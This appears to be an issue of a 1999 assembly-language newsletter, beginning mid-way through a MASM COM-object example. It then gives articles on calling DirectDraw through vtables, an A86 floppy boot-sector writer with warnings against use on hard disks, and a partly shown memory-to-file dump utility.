; pointer in eax
GETOBJECTPOINTER MACRO Object, Interface, pif
mov eax, pif
IF (Object.Interface)
sub eax, Object.Interface
ENDIF
ENDM
;-----------------------------------------------------------------------------
IInterface@QueryInterface proto :DWORD, :DWORD, :DWORD
IInterface@AddRef proto :DWORD
IInterface@Release proto :DWORD
IInterface@Get proto :DWORD
IInterface@Set proto :DWORD, :DWORD
CreateObject proto :DWORD
IsEqualGUID proto :DWORD, :DWORD
externdef IID_IUnknown:GUID
;-----------------------------------------------------------------------------
; declare the interface prototype
IInterface struct
lpVtbl dd ?
IInterface ends
IInterfaceVtbl struct
; IUnknown methods
STDMETHOD QueryInterface, pif:DWORD, riid:DWORD, ppv:DWORD
STDMETHOD AddRef, pif:DWORD
STDMETHOD Release, pif:DWORD
; IInterface methods
STDMETHOD GetValue, pif:DWORD
STDMETHOD SetValue, pif:DWORD, val:DWORD
IInterfaceVtbl ends
; declare the object structure
Object struct
; interface object
interface IInterface <?>
; object data
nRefCount dd ?
nValue dd ?
Object ends
;-----------------------------------------------------------------------------
.data
; define the vtable
@@IInterface segment dword
vtblIInterface:
dd offset IInterface@QueryInterface
dd offset IInterface@AddRef
dd offset IInterface@Release
dd offset IInterface@GetValue
dd offset IInterface@SetValue
@@IInterface ends
; define the interface's IID
; {CF2504E0-4F89-11d3-9AC3-0000E82C0301}
IID_IInterface GUID <0cf2504e0h, 04f89h, 011d3h, <09ah, 0c3h, 00h, 00h,
0e8h, 02ch, 03h, 01h>>
;-----------------------------------------------------------------------------
.code
start:
StartProc proc
LOCAL pif:DWORD ; interface pointer
; create the object
invoke CreateObject, addr [pif]
or eax,eax
js exit
; call the SetValue method
mov eax, [pif]
mov eax, [eax]
invoke (IInterfaceVtbl ptr [eax]).SetValue, [pif], 12345h
; call the GetValue method
mov eax, [pif]
mov eax, [eax]
invoke (IInterfaceVtbl ptr [eax]).GetValue, [pif]
; release the object
mov eax, [pif]
mov eax, [eax]
invoke (IInterfaceVtbl ptr [eax]).Release, [pif]
exit:
ret
StartProc endp
;-----------------------------------------------------------------------------
IInterface@QueryInterface proc uses ebx pif:DWORD, riid:DWORD, ppv:DWORD
invoke IsEqualGUID, [riid], addr IID_IInterface
test eax,eax
jnz @F
invoke IsEqualGUID, [riid], addr IID_IUnknown
test eax,eax
jnz @F
jmp @Error
@@:
GETOBJECTPOINTER Object, interface, pif
lea eax, (Object ptr [eax]).interface
; set *ppv
mov ebx, [ppv]
mov dword ptr [ebx], eax
; increment the reference count
GETOBJECTPOINTER Object, interface, pif
mov eax, (Object ptr [eax]).interface
invoke (IInterfaceVtbl ptr [eax]).AddRef, [pif]
; return S_OK
mov eax, S_OK
jmp return
@Error:
; error, interface not supported
mov eax, [ppv]
mov dword ptr [eax], 0
mov eax, E_NOINTERFACE
return:
ret
IInterface@QueryInterface endp
IInterface@AddRef proc pif:DWORD
GETOBJECTPOINTER Object, interface, pif
inc [(Object ptr [eax]).nRefCount]
mov eax, [(Object ptr [eax]).nRefCount]
ret
IInterface@AddRef endp
IInterface@Release proc pif:DWORD
GETOBJECTPOINTER Object, interface, pif
dec [(Object ptr [eax]).nRefCount]
mov eax, [(Object ptr [eax]).nRefCount]
or eax, eax
jnz @1
; free object
mov eax, [pif]
mov eax, [eax]
invoke LocalFree, eax
@1:
ret
IInterface@Release endp
IInterface@GetValue proc pif:DWORD
GETOBJECTPOINTER Object, interface, pif
mov eax, (Object ptr [eax]).nValue
ret
IInterface@GetValue endp
IInterface@SetValue proc uses ebx pif:DWORD, val:DWORD
GETOBJECTPOINTER Object, interface, pif
mov ebx, eax
mov eax, [val]
mov (Object ptr [ebx]).nValue, eax
ret
IInterface@SetValue endp
;-----------------------------------------------------------------------------
CreateObject proc uses ebx ecx pobj:DWORD
; set *ppv to 0
mov eax, pobj
mov dword ptr [eax], 0
; allocate object
invoke LocalAlloc, LMEM_FIXED, sizeof Object
or eax, eax
jnz @1
; alloc failed, so return
mov eax, E_OUTOFMEMORY
jmp return
@1:
mov ebx, eax
mov (Object ptr [ebx]).interface.lpVtbl, offset vtblIInterface
mov (Object ptr [ebx]).nRefCount, 0
mov (Object ptr [ebx]).nValue, 0
; Query the interface
lea ecx, (Object ptr [ebx]).interface
mov eax, (Object ptr [ebx]).interface.lpVtbl
invoke (IInterfaceVtbl ptr [eax]).QueryInterface,
ecx,
addr IID_IInterface,
[pobj]
cmp eax, S_OK
je return
; error in QueryInterface, so free memory
push eax
invoke LocalFree, ebx
pop eax
return:
ret
CreateObject endp
;-----------------------------------------------------------------------------
IsEqualGUID proc rguid1:DWORD, rguid2:DWORD
cld
mov esi, [rguid1]
mov edi, [rguid2]
mov ecx, sizeof GUID / 4
repe cmpsd
xor eax, eax
or ecx, ecx
setz al
ret
IsEqualGUID endp
end start
Conclusion
------------------------------------------------------------------------------
We have (hopefully) seen how to implement a COM object. We can see that it
is a bit messy to do, and adds quite some overhead to our programs. However,
it can also add great flexibility and power to our programs.
Remember that COM defines only interfaces, and implementation is left to the
programmer. This article presents only one possible implementation. This is
not the only method, nor is it the best one. The reader should feel free to
experiment with other methods.
Copyright (C) 1999 Bill Tyler (billasm@...)
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::..........................................FEATURE.ARTICLE
How to use DirectDraw in ASM
by X-Calibre [Diamond]
Well, there has been quite a large demand for this essay, so I finally started
writing it. This essay will show you how to use C++ objects and COM interface
in Win32ASM, using DirectDraw as an example.
Well, in this part of the Win32 API, you will soon find out how important it
is to know C and C++ when you want to use an API written in these languages.
Judging from the demand for this essay, I think it will be necessary to
explain a bit of how objects work in C++. I will not go too deep, but only
show the things you need to know in Win32ASM.
What are objects really?
Actually a structure is an object of which all fields are public. We will look
at it the other way around. So the public fields in an object make up a
structure. The other fields in an object are private and are not reachable
from the outside. So they are not interesting to us.
A special thing about objects is that they can contain pointers to functions.
Normally, when using C or ASM, this would be possible, but a bit error-prone.
It can be seen as 'dirty' programming. That's why you probably haven't seen it
before.
When using C++ with a compiler, there will be no errors, as long as the
compiler does its job. So here you can use this technique with no chance of
errors, and it gives you some nice new programming options.
C++ goes even further with this 'structure of functions' idea. With
inheritance, you can also overwrite functions of the base class in the
inherited class. You can also create 'virtual' functions, which are defined in
the base class, but the actual code is only in inherited classes.
This is of course interesting for DirectX, where you want to have standard
functions, but with different code, depending on the hardware on which it is
running. So in DirectX, all functions are defined as virtual, and the base
class is inherited by hardware-specific drivers which supply hardware-specific
code. And the beauty of this is, that it's all transparent to the programmer.
The function pointers can change at runtime because of this system, so the C++
designers had to think of a way to keep the pointers to the functions
available to the program at all time.
What this all boils down to is that there is a table with pointers to the
functions. It's called the Virtual Function Table. I will call this the
vtable from now on.
So we need to get this table, in order to call functions from our object.
Lucky for you, Z-Nith has already made a C program to 'capture' the table,
and converted the resulting header file to an include file for use with MASM.
So I'll just explain how you should use this table, and you can get going
soon.
Well, actually it's quite simple. The DirectX objects are defined like this:
IDirectDraw STRUC
lpVtbl DWORD ?
IDirectDraw ENDS
IDirectDrawPalette STRUC
lpVtbl DWORD ?
IDirectDrawPalette ENDS
IDirectDrawClipper STRUC
lpVtbl DWORD ?
IDirectDrawClipper ENDS
IDirectDrawSurface STRUC
lpVtbl DWORD ?
IDirectDrawSurface ENDS
So these structs are actually just a pointer to the vtables, and don't contain
any other values. Well, this makes it all very easy for us then.
I'll give you a small example:
Say we have an IDirectDraw object called lpDD. And we want to call the
RestoreDisplayMode function.
Then we need to do 2 things:
1. Get the vtable.
2. Get the address of the function, using the vtable.
The first part is simple. All the struct contains, is the pointer to the
vtable. So we can just do this:
mov eax, [lpDD]
mov eax, [eax]
Simple, isn't it? And the next part isn't really much harder. The vtable is
put into a structure called IDirectDrawVtbl in DDRAW.INC. We now have the
address of the structure in eax. All we have to do now, is get the correct
member of that structure, to get the address of the function we want to call.
You would have guessed by now, that this will do the trick:
call [IDirectDrawVtbl.RestoreDisplayMode][eax]
That is not a bad guess...
But there's one more thing, which is very important: this function needs to be
invoked on the IDirectDraw object. We may only see the vtable in the structure,
but there are also private members inside the object. So there's more than
meets the eye here. What it comes down to is that the call needs the object
as an argument. And this will be done by stack as always. So we just need to
push lpDD before we call. The complete call will look like this:
push [lpDD]
call [IDirectDrawVtbl.RestoreDisplayMode][eax]
Simple, was it not? And calls with arguments are not much harder.
Let's set the displaymode to 320x200 in 32 bits next.
This call requires 3 arguments:
SetDisplayMode( width, height, bpp );
Well, the extra arguments work just like normal API calls: just push them onto
the stack in backward order.
So it will look like this:
push 32
push 200
push 320
mov eax, [lpDD]
push eax
mov eax, [eax]
call [IDirectDrawVtbl.SetDisplayMode][eax]
And that's all there is to it.
To make life easier, we have included some MASM macros in DDRAW.INC, for use
with the IDirectDraw and IDirectDrawSurface objects:
DDINVOKE MACRO func, this, arglist :VARARG
mov eax, [this]
mov eax, [eax]
IFB <arglist>
INVOKE [IDirectDrawVtbl. func][eax], this
ELSE
INVOKE [IDirectDrawVtbl. func][eax], this, arglist
ENDIF
ENDM
DDSINVOKE MACRO func, this, arglist :VARARG
mov eax, [this]
mov eax, [eax]
IFB <arglist>
INVOKE [IDirectDrawSurfaceVtbl. func][eax], this
ELSE
INVOKE [IDirectDrawSurfaceVtbl. func][eax], this, arglist
ENDIF
ENDM
With these macros, our 2 example calls will look as simple as this:
DDINVOKE RestoreDisplayMode, lpDD
DDINVOKE SetDisplayMode, lpDD, 320, 200, 32
Well, that's basically all there is to know about using objects, COM and
DirectX in Win32ASM. Have fun with it!
And remember:
C and C++ knowledge is power!
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Writing Boot Sectors To Disk
by Jan Verhoeven
Introduction.
-------------
In my previous article I showed how to make a private non-bootable
bootsector for 1.44 Mb floppy disks. Unfortunately, there was no way yet to
write that non-bootsector to a floppy disk....
Enter this code. It is the accompanying bootsector writer for floppy disks.
It assumes that your A: drive is the 1.44 Mb floppy disk drive and I dare
say that this will be true in the majority of cases.
The assembler used
------------------
As usual, I have written this code in A86 format. Until now, not many
aspects of the A86 extensions have been used, but, believe me, in future
articles this will be done.
A86 is particularly useful for people that make syntax errors. It will
insert the errormessages into the sourcefile so that you can easily find
them back. In the next assembler run the error messages are removed again.
To fully use this aspect of A86 programming, I made a small batchfile that
will let me choose between several options while writing the code. Below
you can see the file. After an error, I choose to go back into the editor.
When there are no errors, I might decided to do a trial run. Or to quit to
DOS.
This is all done by means of the WACHT command which waits for a keypress.
It returns (in errorlevel) the indexed position in the command tail table
of th key which was pressed.
Rapid assembly prototyping.
---------------------------
For easy processing and running sourcefiles I use a small batchfile, which
looks like:
----------- Run.Bat --------------------------------------- Start ---------
@echo off
if "%1" == "" goto leave
:start
ed %1.a86
a86 %1.a86 %2 %3 %4 %5 %6
:menu
Echo *
Echo Options:
Echo *Escape = stop
Echo * L = LIST
echo * ;-() = back to the editor
echo * space = test-run of %1.com
echo *Period = debugger-run with %1.com/sym
wacht .\=-[]';-()/":?><{}|+_LCE
if errorlevel 27 goto start
if errorlevel 26 goto screen
if errorlevel 25 goto list
if errorlevel 4 goto start
if errorlevel 3 goto debugger
if errorlevel 2 goto execute
if errorlevel 1 exit
goto menu
:execute
%1
if errorlevel 9 echo Errorlevel = 9+
if errorlevel 8 echo Errorlevel = 8
if errorlevel 7 echo Errorlevel = 7
if errorlevel 6 echo Errorlevel = 6
if errorlevel 5 echo Errorlevel = 5
if errorlevel 4 echo Errorlevel = 4
if errorlevel 3 echo Errorlevel = 3
if errorlevel 2 echo Errorlevel = 2
if errorlevel 1 echo Errorlevel = 1
goto menu
:debugger
vgamode 3
d86 %1
goto menu
:list
list
goto menu
:screen
vgamode 3
goto menu
:leave
echo No file specified
----------- Run.Bat ---------------------------------------- End ----------
This BAT file relies heavily on my computer system. For one, I use DR-DOS 6
which means that I can use the EXIT word to get out of a Batchfile.
Also, I switch videomodes back to Mode 3 with "Vgamode 3" and you will have
to use another command for that, like "Mode co80" or using the utillity
that came with your videocard.
The program "List" is Vernon Buerg's file lister which I use to track down
errors in all kinds of files.
How to write a sector to disk.
------------------------------
Globally there are three methods. The first would be to program the floppy
disk controller, but that is just downright difficult. A second approach
would be to use INT 026, the way DOS does things.
I chose for the BIOS method. For non-partitioned diskstructures this is the
easiest way. Just select track, head and side and write data to the sectors
on that disk.
The bootsector is the very first sector on a disk. For a floppy disk this
boils down to track 0, head 0 and sector 1 (sectors are counted from 1, not
from 0!).
The code is very straightforward. What it does is:
- reset disk drive controller
- open the file to transfer to the bootsector
- read file into internal buffer
- close the file
- repeat 5 times:
- try to tranfer buffer to bootsector of drive A:
- shut down and return to DOS.
- if an error occurs, the user is informed about it.
That's all there's to it.
The Source.
-----------
Below is the sourcecode for this short utillity. I have commented just
about any line I thought fit for it.
----------- Wrs.A86 --------------------------------------- Start ---------
name wrs
title WRite Sector
page 80, 120
stdout = 1 ; the "standard" equates
lf = 10
cr = 13
DATA segment ; define the volatile data area
buffer db 512 dup (?) ; this is enough for one sector
EVEN ; make sure WORD starts at an even address
Handle dw ? ; handle number of file to write
; ----------------------
CODE segment ; start of the actualk code
; no ORG, so we start at offset 0100
jmp main ; jump forward to entry point
db 'VeRsIoN=0.2', 0
db 'CoPyRiGhT=CopyLeft 1999, Jan Verhoeven, '
db 'jverhoeven@...', 0
; ----------------------
filename db 'BootLoad.bin', 0 ; name of file to send to disk
Mess001 db 'Cannot open file BootLoad.bin. '
db 'Operation aborted.', cr, lf
Len001 = $ - Mess001
Mess002 db 'Something went wrong while writing to disk.', cr, lf
Len002 = $ - Mess002
Mess003 db 'The floppy disk subsytem reported an error. '
db 'Trying once more.', cr, lf
Len003 = $ - Mess003
Mess004 db cr, lf, 'Bootsector written. '
db 'Thank you for using this software.'
db cr, lf, 'This program is GNU GPL free software and you use '
db 'it at your won risk.'
db cr, lf, 'Please study the GNU '
db 'General Public License for more details.', cr, lf
Len004 = $ - Mess004
; ----------------------
Error1: mov dx, offset mess001 ; process "cannot open file"
mov cx, len001
mov bx, stdout
mov ah, 040
int 021 ; print via DOS
mov ax, 04C01 ; exit with errorcode = 1
int 021
; ----------------------
Error2: mov dx, offset mess002 ; process "disk error"
mov cx, len002
mov bx, stdout
mov ah, 040
int 021 ; via DOS
mov ax, 04C02 ; exit with errorcode = 2
int 021
; ----------------------
Error2a: push ax, bx, cx, dx ; process "Disk not ready"
mov dx, offset mess003 ; point to message
mov cx, len003 ; this many bytes
mov bx, stdout ; to the console
mov ah, 040 ; do a write
int 021 ; via DOS
pop dx, cx, bx, ax ; restore state of machine
ret ; and return to caller
; ----------------------
main: mov dl, 0 ; choose drive A:
mov ah, 0 ; select funtion 0 ...
int 013 ; ... reset diskdrives
mov dx, offset filename ; point to name of file
mov ax, 03D00 ; to open
int 021 ; via DOS
jc Error1 ; if error, take action
mov [Handle], ax ; no error, => ax = handle
mov dx, offset buffer ; setup pointer, ...
mov cx, 512 ; ... byte count, ...
mov bx, ax ; ... and handle
mov ah, 03F ; to read data from file
int 021 ; via DOS
mov bx, [Handle]
mov ah, 03E
int 021 ; close this file
mov cx, 5 ; prepare for a five times LOOP
L0: push cx
mov bx, offset buffer
mov es, ds ; es:bx = buffer to read from
mov dx, 0000 ; drive A:, head 0
mov cx, 0001 ; Track 0, Sector 1
mov ax, 0301 ; Write sectors, 1 sector
int 013 ; via BIOS
jnc >L1 ; if no error, jump forward
pop cx ; Houston, we have an error!
call error2a ; inform the user
loop L0 ; and try again
jc error2 ; after five times still no go....
L1: mov dx, offset Mess004 ; Signal that we're successful
mov cx, Len004
mov bx, stdout ; to the console
mov ah, 040
int 021 ; via DOS (so it can be redirected)
mov ax, 04C00 ; mention that there were no errors
int 021 ; and return to DOS
----------- Wrs.A86 ---------------------------------------- End ----------
Have fun experimenting with bootsectors. But take care that this will NOT
work on a hard disk.
Hard disk structure.
--------------------
A hard disk uses another layout for it's structure. The very first sector
of a HDD is the MBR (Master BootRecord). It is the only sensible sector in
the first track of a normal HDD. The rest is just empty.
Each partition starts at a cylinder boundary, so the first one starts at
cylinder 1 (track 1, side 0, sector 1). The very first sector of a bootable
partition is the bootsector.
The MBR contains the partition table, indicating where partitions start and
end and whether they are bootable or not. Plus some code to interpret that
table and to find the bootsector that was selected.
If you write a floppy disk bootsector to the very first sector of a HDD,
you wipe out the MBR and hence make inaccesable all data on that disk. The
data will still be there, but the system will not be able anymore to find
or use it.
So please take care that this software is NOT used for drive (DL=) 080.
jverhoeven@...
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Dumping Memory To Disk
by Jan Verhoeven
This piece of code allows you to make a memory dump of any region of
conventional memory (i.e. below 1 Mb) to a diskfile.
The program itself.
-------------------
The source is documented so it speaks for itself. At points of
interest I have insterted "break" and "restart" lines with space for
additional remarks.
So just read the source and read the remarks. This way, the text is
where the code is, and you don't need to go back and forth in the
text. I think this will easier to read than explanation afterwards.
--- Mem2File ------------------------------------------------- Start ---
name mem2file
title Send an area of memory to a diskfile.
page 80, 120
; version 1.0 : Had to be compiled for each area/filename OK: 01-01-1991
; version 1.1 : Same as above, for A86 format OK: 01-01-1999
; version 1.2 : Make it commandline driven OK: 01-02-1999
; version 1.3 : Make it reliable OK: 02-02-1999
; ----------------------
stdout = 1
tab = 9
lf = 10
cr = 13
clr MACRO ; macro called CLeaR
mov #1, 0 ; move it with zero
#EM ; and get outa here
Dum1 STRUC ; a structure definition
OffVal dw ?
SegVal dw ?
ENDS
; ----------------------
DATA segment ; this is where the volatile data lives
ByteF = $
dummy db ? ; just to fool D86....
; if this dummy variable is not here, D86 will
; reference variable "Start" as "ByteF".
even
Start dw ?, ? ; segment:address to start
Stop dw ?, ? ; segment:address to stop
Blocks dw ? ; number of 16K chucks to save
Rest dw ? ; remaining part to save
ArgNum dw ? ; nr of bytes in this argument
OldClp dw ? ; current pointer into command line
Handle dw ?
Length dw ?, ?
FileName: ; this storage is used twice....
Argument db 80 dup (?) ; storage for next argument from command-line
Output db 16K dup (?) ; buffered output
--- Mem2File ------------------------------------------------- Break ---
An A86 enhancement: if you need 16K elements of data, just ask for it.
No need to remember that 16 Kb is 16.384 bytes. The "K" will do.
No big deal, just a nice feature.
Also, if you need to process large binary numbers you may group them
into sub-units separated by underscores. So the number:
1000100100111101
is hard to read back. But if we insert "_" markers like:
1000_1001_0011_1101
the grouping of bits makes them easier to understand. Not that it is a
matter of life and death, but it can come in handy once in a while.
--- Mem2File ------------------------------------------------ Restart --
Bytes = $ - ByteF ; number of volatile databytes
; ----------------------
CODE segment ; no ORG, so we start at 0100
jmp main
HexTable db '0123456789ABCDEF', 0
db 'VeRsIoN=Mem2File 1.3', 0
db 'CoPyRiGhT=CopyLeft Jan Verhoeven, jverhoeven@...', 0
Mess001 db 'Mem2File collects a part of conventional memory and '
db 'sends it to a file.', cr, lf, lf
db 'The syntax is:', cr, lf, lf
db tab, 'Mem2File segm1:offs1 [-] segm2:offs2 '
db '<path>file.ext.', cr, lf, lf
db 'Mem2File is GNU GPL style FREE software. ', cr, lf
db 'Please read the GNU GPL if you are in doubt.', cr, lf, lf
Mess002 db 'Mem2File was made by Jan Verhoeven, NL-5012 GH 272, '
db 'The Netherlands', cr, lf
db 'E-mail address : jverhoeven@...', cr, lf, lf
Len001 = $ - Mess001
Len002 = $ - Mess002
Mess004 db 7, 'Error! All numbers are expected to be hexadecimal.'
db cr, lf
Len004 = $ - Mess004
;------------------------
InitMem: mov di, ByteF ; Init volatile memory with zero's.
mov cx, Bytes ; saves a lot of strange problems.
mov al, 0
rep stosb
ret
;------------------------
--- Mem2File ------------------------------------------------- Break ---
I use volatile data to store data that does not need initialising. This
saves a lot of diskspace and it loads a lot faster. Drawback of volatile
data can be that any rubbish left there by other programs can make your
software go berzerk if you yourself forget to initialise the data.
Therefore I -always- prime the volatile data memory with zero's. Just to
have a well defined starting position.
It should not be necessary, but, on the other hand, how much overhead
and extra execution time is such an initialisation routine?
--- Mem2File ------------------------------------------------ Restart --
L0: mov b [di], 0 ; terminate argument string
mov [OldClp], si ; done, => clean up.
clc ; indicate "No Error"
L3: pop di, si, ax ; restore registers, ...
ret ; ... and leave.
GetArg: push ax, si, di ; get next argument from command-line in ASCIIZ
format
mov si, [OldClp] ; now, where did we leave last time?
cmp si, 0 ; Have we ever used this routine?
IF E mov si, 081 ; if not, prime SI, ...
mov di, offset Argument ; ... DI and ...
mov [ArgNum], 0 ; ... nr of chars in argument.
L1: lodsb ; get byte
cmp al, ' ' ; skip over spaces, ...
je L1
cmp al, tab ; ... and tabs.
je L1
cmp al, 1 ; ONLY if AL is 0, we get a carry
jc L3 ; if CARRY, we're done
--- Mem2File ------------------------------------------------- Break ---
This construction is what I particularly like. I want to check if AL is
Zero. Normally you can code
cmp al, 0
jz L3
but L3 is the error-exit and needs the carrybit to be set as an error
flag. Normally you would enter a
stc
instruction to fullfill the specification. But that is poor programming.
It is better to let the software do this for us.
AL can have any value between 020 and 0FF, plus 00, tab, lf and cr. 01
is not an option. So the sequence
cmp al, 1 ; ONLY if AL is 0, we get a carry
jc L3 ; if CARRY, we're done
will send us to the errorexit WITH the carryflag set, all in one,
without explicitly having to set the carry flag.
--- Mem2File ------------------------------------------------ Restart --
L2: stosb ; else store char in Arguments array
inc [ArgNum] ; adjust counter
lodsb ; and get next char
cmp al, ' ' ; is it a delimiting space?
je L0
cmp al, tab ; or a tab?
je L0
cmp al, ':' ; or a colon?
je L0
cmp al, 0 ; or an end-of-line?
jne L2 ; if not, loop back,
mov si, 0FFFF ; else make SI ridiculously high, ...
stc ; ... set carry flag, ...
jmp L0 ; and get out.
--- Mem2File ------------------------------------------------- Break ---
Ok, ok, ok. I was influenced to make this function by a compiler. No, it
wasn't C. It was Modula-2.
GetArg (if necessary A86 can operate in a case sensitive mode!) extracts
the next argument from the command tail. It puts it in a seperate buffer
at address "Arument" which can hold 80 bytes. Shoyuld be more than
enough for one word or expression.
--- Mem2File ------------------------------------------------ Restart --
;------------------------
L1: stc ; byte not in table!
pop dx ; we came here with carry set!
ret ; exit
L2: sub bx, dx ; calculate position in table
pop dx
clc ; make sure carry is cleared
ret
--- Mem2File ------------------------------------------------- Break ---
This is a typical A86 construction. The subroutine is called TableFind
and it starts in the next line and ends in the previous one!
This is done to have the local labels declared for when they are needed
in the main functionbody. All jumps are "backward". For the CPU there's
no big influence, but for the assembler there is. No guessing about
labels.
--- Mem2File ------------------------------------------------ Restart --
TableFind: ; find AL in ASCIIZ table [BX] ...
push dx ; ... and report position
mov dx, bx ; keep value of SI
L0: cmp b [bx], 0 ; is it end of table?
je L1 ; if so, jump out
cmp al, [bx] ; compare byte with table
je L2 ; if same, jump out
inc bx ; else increment pointer
jmp L0 ; and loop back
;------------------------
MakeUpper:
cmp al, 'a' ; too low?
jb ret
--- Mem2File ------------------------------------------------- Break ---
An A86 enhancement: a conditional return instruction. All sensible CPU's
have conditional CALL and RET instructions. Not the 80x86 line. This CPU
was meant to be structured.
So you have to put a conditional jump before the call, and introduce yet
another silly labelname for the next instruction.
The "Jcc ret" is a good way to circumvent this ommission. What it
does is the same as what, on a Z-80, would be done with a "RET cc"
instruction.
There is one catch, however: there must be a RET instruction within
reach PRIOR to the "Jcc Ret" (internal) macro.
If that is a problem, you could also use the line:
IF cc Ret
So either way you, the programmer, win.
--- Mem2File ------------------------------------------------ Restart --
cmp al, 'z' ; if in range, ...
ja ret
and al, not bit 5 ; ... make uppercase
--- Mem2File ------------------------------------------------- Break ---
A86 is very programmer-oriented and allows us to write down what and how
we think. So if I need to set bit 0 of register Ax, I will simply write
or ax, bit 0
Any value between 0 and 15 is valid in A86 (0 - 31 for A386) to refer to
the respective bit in the respective source.
--- Mem2File ------------------------------------------------ Restart --
ret
;------------------------
BadNumber: ; hey typo, you made a dumbo!
mov dx, offset Mess004
mov cx, Len004
mov bx, StdOut
mov ah, 040
int 021
mov ax, 04C02 ; and exit with errorcode 2
int 021
;------------------------
SyntErr: mov dx, offset Mess001
mov cx, Len001
mov bx, StdOut
mov ah, 040 ; print out "help" screen and ...
int 021
mov ax, 04C01 ; ... exit with errorcode 1
int 021
;------------------------
L8: mov ax, dx ; Convert has result in DX, that's why.
pop dx, bx
ret
Convert: push bx, dx ; convert ASCII to Hex.
mov si, offset Argument
clr dx ; dx will contain result
--- Mem2File ------------------------------------------------- Break ---
Here the macro is invoked. It is used to load the DX register with
zero. If later you decide to change the way in which you want to clear
registers, just change the macro.
In LST files (the assembler listings) the expansions are controlled by
means of the +L switch. If you issue the option "+L35" macro's will not
be expanded in the listings file.
--- Mem2File ------------------------------------------------ Restart --
L1: lodsb ; get first character
cmp al, 0 ; end of string?
je L8
call MakeUpper ; if not, make uppercase
mov bx, offset HexTable
call TableFind ; and lookup in table
jc BadNumber
shl dx, 4 ; multiply DX by 16
--- Mem2File ------------------------------------------------- Break ---
This is another A86 goody. I coded a "SHL DX, 4" instruction, although
I do not know what the target processor will be.
No problem with A86. It will find out with which CPU you are assembling
and use that. If your CPU supports this function, it is implemented as
such. If it doesn't this instruction is expanded as a macro into the
following:
shl dx, 1
shl dx, 1
shl dx, 1
shl dx, 1
More code in the executable, but it makes programming easier.
If on a modern CPU, you can force A86 to act as if the CPU were a
vintage 88 with the commandline switch +P65.
--- Mem2File ------------------------------------------------ Restart --
or dl, bl ; bx = index into table
jmp L1 ; repeat until done
;------------------------
Credits: mov dx, offset Mess002
mov cx, Len002
mov bx, stdout
mov ah, 040
int 021 ; print some egotripping data
ret
;------------------------
main: call InitMem ; prime volatile data
mov al, [080] ; get tail length
cbw ; make 16 bits long
mov si, 081 ; point to start of tail
add si, ax ; point to end of tail
mov [si], ah ; make commandtail ASCIIZ
call GetArg ; get argument from command tail
jc SyntErr ; if error, get out
call Convert ; convert text to hex
mov [Start.SegVal], ax ; store it
call GetArg ; etcetera
jc SyntErr
call Convert
mov [Start.OffVal], ax
L0: call GetArg
jc SyntErr
cmp b [Argument], '-' ; single '-' character?
je L0 ; if so, ignore it
call Convert
mov [Stop.SegVal], ax
call GetArg
jc SyntErr
call Convert
mov [Stop.OffVal], ax
call GetArg
IF C jmp SyntErr
--- Mem2File ------------------------------------------------- Break ---
This is one of the A86 enhancements. This IF construct prevents that you
have to make up all kinds of ridiculous labelnames like jmp_001F in a
construct as follows:
call GetArg
jnc jmp_01F
jmp SyntErr
jmp_01F: ...
The IF construct (not to be confused with the "#IF" construct which is
for conditional assemblies) enables you to just make a fast jump by
stating the reverse condition in the IF statement and acting further
like a high level language:
IF C jmp SyntErr
Neat, isn't it?
--- Mem2File ------------------------------------------------ Restart --
mov si, offset Argument
add si, [ArgNum]
mov b [si], 0 ; make it ASCIIZ
mov dx, offset FileName ; same as Argument buffer....
mov cx, 0
mov ah, 03C
int 021 ; create the file
IF C jmp SyntErr
--- Mem2File ------------------------------------------------- Break ---
See how powerful the IF construct can be? It is a very convenient way to
circumvent the foolish conditional instructions of the x86 architecture.
--- Mem2File ------------------------------------------------ Restart --
mov [Handle], ax
mov ax, [Stop.SegVal]
mov dx, 0 ; prime DX
mov cx, 4
L0: shl ax, 1
rcl dx, 1
loop L0 ; shift upper 4 bits of address into DX
add ax, [Stop.OffVal]
adc dx, 0 ; now, dx:ax = linear address to stop at
mov [Stop.SegVal], dx
mov [Stop.OffVal], ax ; store linear address STOP
mov ax, [Start.SegVal]
mov dx, 0 ; prime DX
mov cx, 4
L0: shl ax, 1
rcl dx, 1
loop L0 ; shift upper 4 bits of address into DX
add ax, [Start.OffVal]
adc dx, 0 ; now, dx:ax = linear address to start
from
mov [Start.SegVal], dx
mov [Start.OffVal], ax ; store linear address START
cmp dx, [Stop.SegVal] ; start > stop?
ja >L1 ; fix it!
jb >L2
--- Mem2File ------------------------------------------------- Break ---
A86 likes to have as much as possible labels declared before they are
referenced. That's why many times there is code "before" the subroutine
name is declared.
For local labels (i.e. labels that consist of 1 letter and the rest
decimal digits) it is a MUST that they are defined before being
referenced.
If, for some reason, you do not want to put a label backwards in memory,
you can forward reference a local label by prefixing it with a ">" sign.
A86 now knows that the local label still has to come. Not a luxury since
many A86 programmers can do with 4 or 5 local labels in over 2000 lines
of code.... Especially L0 is always very well available.
--- Mem2File ------------------------------------------------ Restart --
cmp ax, [Stop.OffVal] ; start > stop?
jbe >L2 ; if not, OK
L1: push [Stop.SegVal]
push [Stop.OffVal] ; swap start and stop addresses
mov [Stop.SegVal], dx
mov [Stop.OffVal], ax
pop [Start.OffVal]
pop [Start.SegVal]
L2: mov dx, [Stop.SegVal]
mov ax, [Stop.OffVal]
add ax, 1
adc dx, 0 ; limits are INCLUSIVE
sub ax, [Start.OffVal]
sbb dx, [Start.SegVal] ; dx:ax = bytes to move
shl ax, 1
rcl dx, 1
shl ax, 1
rcl dx, 1 ; dx = nr of 16 Kb blocks to move
mov [Blocks], dx ; store it
shr ax, 2 ; ax = remainder to move
mov [Rest], ax ; save it
mov ax, [Start.SegVal] ; end of linear addressing, we're going
to DOS!
mov cl, 12
shl ax, cl
mov [Start.SegVal], ax
mov es, ds ; use es to refer to data
mov bx, [Handle]
lds dx, d [Start]
--- Mem2File ------------------------------------------------- Break ---
Normally this instruction would require a secretary with 100 letters per
minute typing rate:
lds dx, dword ptr [Start]
But the "ptr" argument is always the same, so it is only there to please
the assembler and humiliate the programmer: entering data that nobody
needs.
Therefore A86 only needs the first letter of such prose. In our case:
the "dword ptr" is abbreviated to a "d". "Byte ptr" is a "b". "Word Ptr"
is a "w". Simple as that.
So if your coding skills outweigh your typing speed, you should consider
switching to the superior assembler. :)
